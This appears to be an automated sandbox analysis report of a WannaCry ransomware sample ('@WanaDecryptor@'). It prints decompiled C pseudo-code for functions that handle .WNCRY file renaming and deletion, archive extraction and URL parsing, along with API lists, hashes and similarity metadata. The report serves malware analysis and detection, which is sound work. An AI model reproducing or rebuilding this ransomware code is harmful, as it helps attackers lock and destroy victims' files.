                                                      • API ID: MessageSend$#3092$#1641Create$#4710BrushFontSolid
                                                      • String ID: Arial
                                                      • API String ID: 1126252797-493054409
                                                      • Opcode ID: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                                      • Instruction ID: f8dd995afa615cab71677879a74d6ff7c2e305333cbfc3da3be905e2a6067967
                                                      • Opcode Fuzzy Hash: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                                      • Instruction Fuzzy Hash: CC21C6B13507107FE625A764DD86FAA2759BBC8B40F10011EB345AB2D1CAF5EC41879C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406DC0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 64%
                                                      			E00406DC0(void* __ecx) {
				int _v76;
				int _v80;
				char _v84;
				int _v88;
				long _v92;
				void* _v96;
				int _v100;
				void* _v104;
				long _t28;
				void* _t29;
				struct HWND__* _t30;
				int _t32;
				void* _t35;
				int _t39;
				long _t47;
				int _t48;
				void* _t51;

				_t35 = __ecx;
				_t48 = 0;
				_t28 = SendMessageA( *(__ecx + 0x4e0), 0xe, 0, 0);
				_t47 = _t28;
				_v96 = 0;
				_v92 = _t47;
				_t4 = _t47 + 1; // 0x1
				L00412CEC();
				_t51 =  &_v104 + 4;
				_v88 = _t28;
				if(_t28 == 0) {
					return _t28;
				}
				_t29 = _t35 + 0x4c0;
				if(_t29 != 0) {
					_t30 =  *(_t29 + 0x20);
				} else {
					_t30 = 0;
				}
				SendMessageA(_t30, 0x44b, _t48,  &_v96);
				_t32 = _v88;
				 *((char*)(_t32 + _t47)) = 0;
				if(_t47 < 0) {
					L15:
					_push(_v88);
					L00412C98();
					return _t32;
				} else {
					do {
						__imp___strnicmp(_t48 + _v88, "<http://", 8);
						_t51 = _t51 + 0xc;
						if(_t32 == 0) {
							L7:
							_t48 = _t48 + 1;
							_t39 = _t48;
							if(_t48 > _t47) {
								goto L14;
							}
							_t32 = _v88;
							while( *((char*)(_t48 + _t32)) != 0x3e) {
								_t48 = _t48 + 1;
								if(_t48 <= _t47) {
									continue;
								}
								goto L14;
							}
							_t32 = _t48;
							_t48 = _t48 + 1;
							if(_t32 != 0xffffffff) {
								_v100 = _t32;
								_v104 = _t39;
								SendMessageA( *(_t35 + 0x4e0), 0x437, 0,  &_v104);
								_t32 = 0x20;
								_push( &_v84);
								_v84 = 0x54;
								_v76 = 0x20;
								_v80 = 0x20;
								L00412F4A();
							}
							goto L14;
						}
						_t32 = _v88;
						__imp___strnicmp(_t48 + _t32, "<https://", 9);
						_t51 = _t51 + 0xc;
						if(_t32 != 0) {
							goto L14;
						}
						goto L7;
						L14:
						_t48 = _t48 + 1;
					} while (_t48 <= _t47);
					goto L15;
				}
			}




















                                                      0x00406dcc
                                                      0x00406dce
                                                      0x00406ddc
                                                      0x00406dde
                                                      0x00406de0
                                                      0x00406de4
                                                      0x00406de8
                                                      0x00406dec
                                                      0x00406df1
                                                      0x00406df6
                                                      0x00406dfa
                                                      0x00406ee6
                                                      0x00406ee6
                                                      0x00406e00
                                                      0x00406e08
                                                      0x00406e0e
                                                      0x00406e0a
                                                      0x00406e0a
                                                      0x00406e0a
                                                      0x00406e1d
                                                      0x00406e1f
                                                      0x00406e25
                                                      0x00406e29
                                                      0x00406ed2
                                                      0x00406ed6
                                                      0x00406ed7
                                                      0x00000000
                                                      0x00406e2f
                                                      0x00406e2f
                                                      0x00406e3e
                                                      0x00406e44
                                                      0x00406e49
                                                      0x00406e67
                                                      0x00406e67
                                                      0x00406e6a
                                                      0x00406e6c
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e6e
                                                      0x00406e72
                                                      0x00406e78
                                                      0x00406e7b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e7d
                                                      0x00406e7f
                                                      0x00406e81
                                                      0x00406e85
                                                      0x00406e8b
                                                      0x00406e9e
                                                      0x00406ea2
                                                      0x00406ea8
                                                      0x00406ead
                                                      0x00406eb4
                                                      0x00406ebc
                                                      0x00406ec0
                                                      0x00406ec4
                                                      0x00406ec4
                                                      0x00000000
                                                      0x00406e85
                                                      0x00406e4b
                                                      0x00406e5a
                                                      0x00406e60
                                                      0x00406e65
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406ec9
                                                      0x00406ec9
                                                      0x00406eca
                                                      0x00000000
                                                      0x00406e2f

                                                      APIs
                                                      • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
                                                      • #823.MFC42(00000001,?,?), ref: 00406DEC
                                                      • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
                                                      • _strnicmp.MSVCRT ref: 00406E3E
                                                      • _strnicmp.MSVCRT ref: 00406E5A
                                                      • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
                                                      • #6136.MFC42 ref: 00406EC4
                                                      • #825.MFC42(?), ref: 00406ED7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$_strnicmp$#6136#823#825
                                                      • String ID: <http://$<https://$T
                                                      • API String ID: 1228111698-1216084165
                                                      • Opcode ID: d423051487410fe263d6ec4d138bc8bb6478c9a20731e0d0eb8aa801e432672a
                                                      • Instruction ID: 32e461136b03d60599108953de6477053a568cccd29e118696d71e5d9ed076ef
                                                      • Opcode Fuzzy Hash: d423051487410fe263d6ec4d138bc8bb6478c9a20731e0d0eb8aa801e432672a
                                                      • Instruction Fuzzy Hash: 7E31D6B52043509BD320CF18CC41FABB7E4BB98704F044A3EF98AD7281E678D95987D9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402560 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 81fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E00402560(intOrPtr __ecx, WCHAR* _a4) {
				short _v720;
				intOrPtr _v724;
				void* _t21;
				void* _t22;
				WCHAR* _t23;
				void* _t30;
				short* _t31;
				intOrPtr* _t32;
				void* _t34;
				void* _t36;

				_t23 = _a4;
				_v724 = __ecx;
				_t30 = 0;
				wcscpy( &_v720, _t23);
				_t31 = wcsrchr( &_v720, 0x2e);
				_t34 =  &_v724 + 0x10;
				if(_t31 == 0) {
					L4:
					wcscat( &_v720, L".org");
				} else {
					_t32 = __imp___wcsicmp;
					_t21 =  *_t32(_t31, L".WNCRY");
					_t36 = _t34 + 8;
					if(_t21 == 0) {
						L3:
						 *_t31 = 0;
						_t30 = 1;
					} else {
						_t22 =  *_t32(_t31, L".WNCYR");
						_t34 = _t36 + 8;
						if(_t22 != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				if(E004020A0(_v724, _t23,  &_v720) == 0) {
					DeleteFileW( &_v720);
					goto L11;
				} else {
					if(DeleteFileW(_t23) == 0) {
						L11:
						return 0;
					} else {
						if(_t30 != 0) {
							return 1;
						} else {
							return MoveFileW( &_v720, _t23);
						}
					}
				}
			}













                                                      0x00402567
                                                      0x00402576
                                                      0x0040257b
                                                      0x0040257d
                                                      0x00402590
                                                      0x00402592
                                                      0x00402597
                                                      0x004025c9
                                                      0x004025d3
                                                      0x00402599
                                                      0x00402599
                                                      0x004025a5
                                                      0x004025a7
                                                      0x004025ac
                                                      0x004025bd
                                                      0x004025bd
                                                      0x004025c2
                                                      0x004025ae
                                                      0x004025b4
                                                      0x004025b6
                                                      0x004025bb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004025bb
                                                      0x004025ac
                                                      0x004025ed
                                                      0x0040262e
                                                      0x00000000
                                                      0x004025ef
                                                      0x004025f8
                                                      0x00402637
                                                      0x00402640
                                                      0x004025fa
                                                      0x004025fc
                                                      0x00402626
                                                      0x004025fe
                                                      0x00402614
                                                      0x00402614
                                                      0x004025fc
                                                      0x004025f8

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete_wcsicmp$Movewcscatwcscpywcsrchr
                                                      • String ID: .WNCRY$.WNCYR$.org
                                                      • API String ID: 1016768320-4283512309
                                                      • Opcode ID: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                                      • Instruction ID: 8e688c7c8c2018b5eb76f9bfe5eaf8fc18d5300b1d9ff01e022ce9e0f1e53e02
                                                      • Opcode Fuzzy Hash: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                                      • Instruction Fuzzy Hash: 29219576240301ABD220DB15FE49BEB7799DBD4711F44483BF901A2280EB7DD90987BE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00412360 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 366COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E00412360(signed int __ecx, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v0;
				char _v260;
				struct _FILETIME _v268;
				struct _FILETIME _v276;
				struct _FILETIME _v284;
				void* _v292;
				void* _v296;
				signed int _v304;
				char _v560;
				struct _OVERLAPPED* _v820;
				void* _v824;
				void* _v827;
				void* _v828;
				long _v829;
				void* _v836;
				intOrPtr _t68;
				long _t77;
				void* _t81;
				void* _t82;
				void* _t90;
				void* _t91;
				long _t94;
				signed int _t97;
				long _t99;
				void* _t106;
				int _t116;
				long _t121;
				signed int _t132;
				signed int _t138;
				unsigned int _t140;
				signed int _t141;
				void* _t154;
				intOrPtr* _t157;
				intOrPtr _t166;
				void* _t174;
				signed int _t175;
				signed int _t176;
				long _t177;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t180;
				void* _t182;
				long _t183;
				intOrPtr* _t185;
				void* _t187;
				void* _t191;
				void* _t192;

				_t166 = _a16;
				_t132 = __ecx;
				if(_t166 == 3) {
					_t68 =  *((intOrPtr*)(__ecx + 4));
					_t176 = _a4;
					__eflags = _t176 - _t68;
					if(_t176 == _t68) {
						L14:
						_t177 = E00411810( *_t132, _a8, _a12,  &_v829);
						__eflags = _t177;
						if(_t177 <= 0) {
							E00411AC0( *_t132);
							 *(_t132 + 4) = 0xffffffff;
						}
						__eflags = _v829;
						if(_v829 == 0) {
							__eflags = _t177;
							if(_t177 <= 0) {
								asm("sbb eax, eax");
								_t77 = 0x1000 + ( ~(_t177 - 0xffffff96) & 0x04fff000);
								__eflags = _t77;
								return _t77;
							} else {
								return 0x600;
							}
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = _t68 - 0xffffffff;
						if(_t68 != 0xffffffff) {
							E00411AC0( *((intOrPtr*)(__ecx)));
							_t187 = _t187 + 4;
						}
						_t81 =  *_t132;
						 *(_t132 + 4) = 0xffffffff;
						__eflags = _t176 -  *((intOrPtr*)(_t81 + 4));
						if(_t176 <  *((intOrPtr*)(_t81 + 4))) {
							__eflags = _t176 -  *((intOrPtr*)(_t81 + 0x10));
							if(_t176 <  *((intOrPtr*)(_t81 + 0x10))) {
								E00411390(_t81);
								_t187 = _t187 + 4;
							}
							_t82 =  *_t132;
							__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							while( *((intOrPtr*)(_t82 + 0x10)) < _t176) {
								E004113E0(_t82);
								_t82 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							}
							_push( *((intOrPtr*)(_t132 + 0x138)));
							_push( *_t132);
							E00411660();
							_t187 = _t187 + 8;
							 *(_t132 + 4) = _t176;
							goto L14;
						} else {
							return 0x10000;
						}
					}
				} else {
					if(_t166 == 2 || _t166 == 1) {
						_t178 = _t175 | 0xffffffff;
						__eflags =  *(_t132 + 4) - _t178;
						if( *(_t132 + 4) != _t178) {
							E00411AC0( *_t132);
							_t187 = _t187 + 4;
						}
						_t90 =  *_t132;
						 *(_t132 + 4) = _t178;
						_t179 = _a4;
						__eflags = _t179 -  *((intOrPtr*)(_t90 + 4));
						if(_t179 <  *((intOrPtr*)(_t90 + 4))) {
							__eflags = _t179 -  *((intOrPtr*)(_t90 + 0x10));
							if(_t179 <  *((intOrPtr*)(_t90 + 0x10))) {
								E00411390(_t90);
								_t187 = _t187 + 4;
							}
							_t91 =  *_t132;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							while( *((intOrPtr*)(_t91 + 0x10)) < _t179) {
								E004113E0(_t91);
								_t91 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							}
							_t138 = _t132;
							E00411CF0(_t138, _t179,  &_v560);
							__eflags = _v304 & 0x00000010;
							if((_v304 & 0x00000010) == 0) {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t157 = _a8;
									_t185 = _t157;
									_t180 = _t157;
									_t94 =  *_t157;
									__eflags = _t94;
									while(_t94 != 0) {
										__eflags = _t94 - 0x2f;
										if(_t94 == 0x2f) {
											L43:
											_t185 = _t180 + 1;
										} else {
											__eflags = _t94 - 0x5c;
											if(_t94 == 0x5c) {
												goto L43;
											}
										}
										_t94 =  *((intOrPtr*)(_t180 + 1));
										_t180 = _t180 + 1;
										__eflags = _t94;
									}
									asm("repne scasb");
									_t140 =  !(_t138 | 0xffffffff);
									_v828 =  &_v820;
									_t182 = _t157 - _t140;
									_t141 = _t140 >> 2;
									_t97 = memcpy(_v828, _t182, _t141 << 2);
									__eflags = _t185 - _t157;
									memcpy(_t182 + _t141 + _t141, _t182, _t97 & 0x00000003);
									_t191 = _t187 + 0x18;
									if(__eflags != 0) {
										 *((char*)(_t191 + _t185 - _t157 + 0x1c)) = 0;
										_t99 = _v820;
										__eflags = _t99 - 0x2f;
										if(_t99 == 0x2f) {
											L55:
											wsprintfA( &_v260, "%s%s",  &_v820, _t185);
											E00412250(0, _t191 + 0x2c);
											_t187 = _t191 + 0x18;
											goto L48;
										} else {
											__eflags = _t99 - 0x5c;
											if(_t99 == 0x5c) {
												goto L55;
											} else {
												__eflags = _t99;
												if(_t99 == 0) {
													goto L47;
												} else {
													__eflags =  *((char*)(_t191 + 0x1d)) - 0x3a;
													if( *((char*)(_t191 + 0x1d)) != 0x3a) {
														goto L47;
													} else {
														goto L55;
													}
												}
											}
										}
										goto L73;
									} else {
										_v820 = 0;
										L47:
										wsprintfA( &_v260, "%s%s%s", _t132 + 0x140,  &_v820, _t185);
										E00412250(_t132 + 0x140, _t191 + 0x30);
										_t187 = _t191 + 0x1c;
									}
									L48:
									_t174 = CreateFileA(_t187 + 0x260, 0x40000000, 0, 0, 2,  *(_t187 + 0x228), 0);
								} else {
									_t174 = _a8;
								}
								__eflags = _t174 - 0xffffffff;
								if(_t174 != 0xffffffff) {
									_push( *((intOrPtr*)(_t132 + 0x138)));
									_push( *_t132);
									E00411660();
									_t106 =  *(_t132 + 0x13c);
									_t192 = _t187 + 8;
									__eflags = _t106;
									if(_t106 == 0) {
										_push(0x4000);
										L00412CEC();
										_t192 = _t192 + 4;
										 *(_t132 + 0x13c) = _t106;
									}
									_v820 = 0;
									while(1) {
										_t183 = E00411810( *_t132,  *(_t132 + 0x13c), 0x4000, _t192 + 0x13);
										_t192 = _t192 + 0x10;
										__eflags = _t183 - 0xffffff96;
										if(_t183 == 0xffffff96) {
											break;
										}
										__eflags = _t183;
										if(__eflags < 0) {
											L68:
											_v820 = 0x5000000;
										} else {
											if(__eflags <= 0) {
												L63:
												__eflags =  *(_t192 + 0x13);
												if( *(_t192 + 0x13) != 0) {
													SetFileTime(_t174,  &_v276,  &_v284,  &_v268);
												} else {
													__eflags = _t183;
													if(_t183 == 0) {
														goto L68;
													} else {
														continue;
													}
												}
											} else {
												_t116 = WriteFile(_t174,  *(_t132 + 0x13c), _t183, _t192 + 0x18, 0);
												__eflags = _t116;
												if(_t116 == 0) {
													_v820 = 0x400;
												} else {
													goto L63;
												}
											}
										}
										L70:
										__eflags =  *((intOrPtr*)(_t192 + 0x360)) - 1;
										if( *((intOrPtr*)(_t192 + 0x360)) != 1) {
											CloseHandle(_t174);
										}
										E00411AC0( *_t132);
										return _v820;
										goto L73;
									}
									_v820 = 0x1000;
									goto L70;
								} else {
									return 0x200;
								}
							} else {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t154 = _a8;
									_t121 =  *_t154;
									__eflags = _t121 - 0x2f;
									if(_t121 == 0x2f) {
										L36:
										E00412250(0, _t154);
										__eflags = 0;
										return 0;
									} else {
										__eflags = _t121 - 0x5c;
										if(_t121 == 0x5c) {
											goto L36;
										} else {
											__eflags = _t121;
											if(_t121 == 0) {
												L37:
												E00412250(_t132 + 0x140, _t154);
												__eflags = 0;
												return 0;
											} else {
												__eflags =  *((char*)(_t154 + 1)) - 0x3a;
												if( *((char*)(_t154 + 1)) != 0x3a) {
													goto L37;
												} else {
													goto L36;
												}
											}
										}
									}
								} else {
									__eflags = 0;
									return 0;
								}
							}
						} else {
							return 0x10000;
						}
					} else {
						return 0x10000;
					}
				}
				L73:
			}


















































                                                      0x0041236a
                                                      0x00412371
                                                      0x00412376
                                                      0x0041239c
                                                      0x0041239f
                                                      0x004123a6
                                                      0x004123a8
                                                      0x00412414
                                                      0x00412431
                                                      0x00412436
                                                      0x00412438
                                                      0x0041243d
                                                      0x00412445
                                                      0x00412445
                                                      0x00412450
                                                      0x00412452
                                                      0x00412463
                                                      0x00412465
                                                      0x00412482
                                                      0x0041248b
                                                      0x0041248b
                                                      0x00412496
                                                      0x0041246a
                                                      0x00412476
                                                      0x00412476
                                                      0x00412457
                                                      0x00412457
                                                      0x00412460
                                                      0x00412460
                                                      0x004123aa
                                                      0x004123aa
                                                      0x004123ad
                                                      0x004123b2
                                                      0x004123b7
                                                      0x004123b7
                                                      0x004123ba
                                                      0x004123bc
                                                      0x004123c3
                                                      0x004123c6
                                                      0x004123da
                                                      0x004123dd
                                                      0x004123e0
                                                      0x004123e5
                                                      0x004123e5
                                                      0x004123e8
                                                      0x004123ea
                                                      0x004123ed
                                                      0x004123f0
                                                      0x004123f5
                                                      0x004123f7
                                                      0x004123fa
                                                      0x004123fa
                                                      0x00412407
                                                      0x00412408
                                                      0x00412409
                                                      0x0041240e
                                                      0x00412411
                                                      0x00000000
                                                      0x004123cb
                                                      0x004123d7
                                                      0x004123d7
                                                      0x004123c6
                                                      0x00412378
                                                      0x0041237b
                                                      0x0041249c
                                                      0x0041249f
                                                      0x004124a1
                                                      0x004124a6
                                                      0x004124ab
                                                      0x004124ab
                                                      0x004124ae
                                                      0x004124b0
                                                      0x004124b3
                                                      0x004124ba
                                                      0x004124bd
                                                      0x004124d1
                                                      0x004124d4
                                                      0x004124d7
                                                      0x004124dc
                                                      0x004124dc
                                                      0x004124df
                                                      0x004124e1
                                                      0x004124e4
                                                      0x004124e7
                                                      0x004124ec
                                                      0x004124ee
                                                      0x004124f1
                                                      0x004124f1
                                                      0x004124fd
                                                      0x00412501
                                                      0x00412506
                                                      0x0041250e
                                                      0x00412578
                                                      0x0041257b
                                                      0x00412589
                                                      0x00412590
                                                      0x00412592
                                                      0x00412594
                                                      0x00412596
                                                      0x00412598
                                                      0x0041259a
                                                      0x0041259c
                                                      0x004125a2
                                                      0x004125a2
                                                      0x0041259e
                                                      0x0041259e
                                                      0x004125a0
                                                      0x00000000
                                                      0x00000000
                                                      0x004125a0
                                                      0x004125a5
                                                      0x004125a8
                                                      0x004125a9
                                                      0x004125a9
                                                      0x004125b8
                                                      0x004125ba
                                                      0x004125be
                                                      0x004125c4
                                                      0x004125ca
                                                      0x004125cd
                                                      0x004125d4
                                                      0x004125d6
                                                      0x004125d6
                                                      0x004125d8
                                                      0x0041264d
                                                      0x00412652
                                                      0x00412656
                                                      0x00412658
                                                      0x00412671
                                                      0x00412684
                                                      0x00412691
                                                      0x00412696
                                                      0x00000000
                                                      0x0041265a
                                                      0x0041265a
                                                      0x0041265c
                                                      0x00000000
                                                      0x0041265e
                                                      0x0041265e
                                                      0x00412660
                                                      0x00000000
                                                      0x00412666
                                                      0x00412666
                                                      0x0041266b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041266b
                                                      0x00412660
                                                      0x0041265c
                                                      0x00000000
                                                      0x004125da
                                                      0x004125da
                                                      0x004125df
                                                      0x004125f9
                                                      0x00412605
                                                      0x0041260a
                                                      0x0041260a
                                                      0x0041260d
                                                      0x00412630
                                                      0x0041257d
                                                      0x0041257d
                                                      0x0041257d
                                                      0x00412632
                                                      0x00412635
                                                      0x004126a6
                                                      0x004126a7
                                                      0x004126a8
                                                      0x004126ad
                                                      0x004126b3
                                                      0x004126b6
                                                      0x004126b8
                                                      0x004126ba
                                                      0x004126bf
                                                      0x004126c4
                                                      0x004126c7
                                                      0x004126c7
                                                      0x004126d3
                                                      0x004126db
                                                      0x004126f4
                                                      0x004126f6
                                                      0x004126f9
                                                      0x004126fc
                                                      0x00000000
                                                      0x00000000
                                                      0x004126fe
                                                      0x00412700
                                                      0x0041273c
                                                      0x0041273c
                                                      0x00412702
                                                      0x00412702
                                                      0x0041271a
                                                      0x0041271e
                                                      0x00412720
                                                      0x0041275f
                                                      0x00412722
                                                      0x00412722
                                                      0x00412724
                                                      0x00000000
                                                      0x00412726
                                                      0x00000000
                                                      0x00412726
                                                      0x00412724
                                                      0x00412704
                                                      0x00412714
                                                      0x00412716
                                                      0x00412718
                                                      0x00412732
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00412718
                                                      0x00412702
                                                      0x00412765
                                                      0x00412765
                                                      0x0041276d
                                                      0x00412770
                                                      0x00412770
                                                      0x00412779
                                                      0x0041278f
                                                      0x00000000
                                                      0x0041278f
                                                      0x00412728
                                                      0x00000000
                                                      0x0041263a
                                                      0x00412646
                                                      0x00412646
                                                      0x00412510
                                                      0x00412510
                                                      0x00412513
                                                      0x00412524
                                                      0x0041252b
                                                      0x0041252d
                                                      0x0041252f
                                                      0x0041253f
                                                      0x00412542
                                                      0x0041254a
                                                      0x00412556
                                                      0x00412531
                                                      0x00412531
                                                      0x00412533
                                                      0x00000000
                                                      0x00412535
                                                      0x00412535
                                                      0x00412537
                                                      0x00412559
                                                      0x00412561
                                                      0x00412569
                                                      0x00412575
                                                      0x00412539
                                                      0x00412539
                                                      0x0041253d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041253d
                                                      0x00412537
                                                      0x00412533
                                                      0x00412518
                                                      0x00412518
                                                      0x00412521
                                                      0x00412521
                                                      0x00412513
                                                      0x004124c2
                                                      0x004124ce
                                                      0x004124ce
                                                      0x0041238d
                                                      0x00412399
                                                      0x00412399
                                                      0x0041237b
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s%s$%s%s%s$:
                                                      • API String ID: 0-3034790606
                                                      • Opcode ID: 5870813841fd6422a36b130af846364780db05c619c896662a0e99f340824b5b
                                                      • Instruction ID: ec0a86814d75b7591ef383b01d603f7b60d36dbaf36e5cde56c141efaaef7cbf
                                                      • Opcode Fuzzy Hash: 5870813841fd6422a36b130af846364780db05c619c896662a0e99f340824b5b
                                                      • Instruction Fuzzy Hash: 67C138726002045BDB20DF18ED81BEB7398EB85314F04456BFD54CB385D2BDE99A87AA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00413102 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x41baa8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x422298 =  *0x422298 | 0xffffffff;
				 *0x42229c =  *0x42229c | 0xffffffff;
				 *(__p__fmode()) =  *0x42228c;
				 *(__p__commode()) =  *0x422288;
				 *0x422294 = _adjust_fdiv;
				_t27 = E004133C7( *_adjust_fdiv);
				_t61 =  *0x421790; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E004133C4);
				}
				E004133B2(_t27);
				_push(0x41f018);
				_push(0x41f014);
				L004133AC();
				_v112 =  *0x422284;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x422280,  &_v112);
				_push(0x41f010);
				_push(0x41f000);
				L004133AC();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E004133E6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L004133A6();
				return _t41;
			}
























                                                      0x00413105
                                                      0x00413107
                                                      0x0041310c
                                                      0x00413117
                                                      0x00413118
                                                      0x00413125
                                                      0x0041312a
                                                      0x0041312f
                                                      0x00413136
                                                      0x0041313d
                                                      0x00413150
                                                      0x0041315e
                                                      0x00413167
                                                      0x0041316c
                                                      0x00413171
                                                      0x00413177
                                                      0x0041317e
                                                      0x00413184
                                                      0x00413185
                                                      0x0041318a
                                                      0x0041318f
                                                      0x00413194
                                                      0x0041319e
                                                      0x004131b7
                                                      0x004131bd
                                                      0x004131c2
                                                      0x004131c7
                                                      0x004131d4
                                                      0x004131d6
                                                      0x004131dc
                                                      0x00413218
                                                      0x0041321d
                                                      0x0041321e
                                                      0x0041321e
                                                      0x004131de
                                                      0x004131de
                                                      0x004131de
                                                      0x004131df
                                                      0x004131e2
                                                      0x004131e4
                                                      0x004131ef
                                                      0x004131f1
                                                      0x004131f1
                                                      0x004131f2
                                                      0x004131f2
                                                      0x004131ef
                                                      0x004131f5
                                                      0x004131f9
                                                      0x00000000
                                                      0x00000000
                                                      0x004131ff
                                                      0x00413206
                                                      0x00413210
                                                      0x00413225
                                                      0x00413212
                                                      0x00413212
                                                      0x00413212
                                                      0x00413231
                                                      0x00413236
                                                      0x0041323a
                                                      0x00413240
                                                      0x00413245
                                                      0x00413247
